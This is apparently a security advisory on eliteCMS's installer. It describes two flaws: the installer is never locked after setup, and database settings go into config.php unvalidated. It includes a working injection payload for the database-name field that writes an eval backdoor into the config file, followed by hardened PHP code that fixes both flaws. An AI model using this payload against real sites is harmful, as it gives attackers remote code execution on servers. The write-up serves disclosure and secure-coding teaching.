eliteCMS does not lock its installer after installation finishes, so an attacker who can reach the installer URL can run the installation again.
A second vulnerability is that the installer can be made to write a one-line PHP backdoor directly into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at this code:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
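As an added example (not eliteCMS's own code), here is a hardened version of the step-4 config writer that addresses both problems: it refuses to run once an install lock exists, allow-lists each value, and emits values with var_export() so that a quote or PHP tag in a value stays inside a string literal instead of closing it. The config and lock file paths are assumptions.

```php
<?php
// Added example, not eliteCMS code: hardened step-4 config writer.
// CONFIG_FILE and LOCK_FILE paths are assumptions.
declare(strict_types=1);

const CONFIG_FILE = __DIR__ . '/../admin/includes/config.php';
const LOCK_FILE   = __DIR__ . '/install.lock';

// Allow-list each value. DB_NAME in particular must be a bare identifier,
// so quotes, whitespace and "?>" are rejected before anything is written.
function validate_db_value(string $key, string $value): string
{
    $patterns = [
        'DB_SERVER' => '/^[A-Za-z0-9._:-]{1,255}$/',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.@-]{1,64}$/',
        'DB_PASS'   => '/^[^\x00\r\n]{0,255}$/', // any printable; escaped below
    ];
    if (!isset($patterns[$key]) || !preg_match($patterns[$key], $value)) {
        throw new InvalidArgumentException("invalid value for $key");
    }
    return $value;
}

// Build config.php. var_export() emits a quoted, escaped PHP string literal,
// so a value such as "?><?php ... ?>" remains data instead of closing the
// string and ending PHP mode, which is how the original concatenation breaks.
function build_config(array $values): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $safe = validate_db_value($key, (string)($values[$key] ?? ''));
        $out .= 'define(' . var_export($key, true) . ', '
              . var_export($safe, true) . ");\n";
    }
    return $out;
}

// Step 4 entry point: lock check first, then write, then create the lock.
function run_step4(array $post): void
{
    if (file_exists(LOCK_FILE)) {
        http_response_code(403);
        exit('Installation is already locked.');
    }
    if (file_put_contents(CONFIG_FILE, build_config($post), LOCK_EX) === false) {
        throw new RuntimeException('could not write config.php');
    }
    touch(LOCK_FILE);   // subsequent visits to the installer are refused
}
```

Calling run_step4($_POST) with the DB_NAME payload shown above throws before any file is touched, and even a value that passes the pattern is written as an escaped literal.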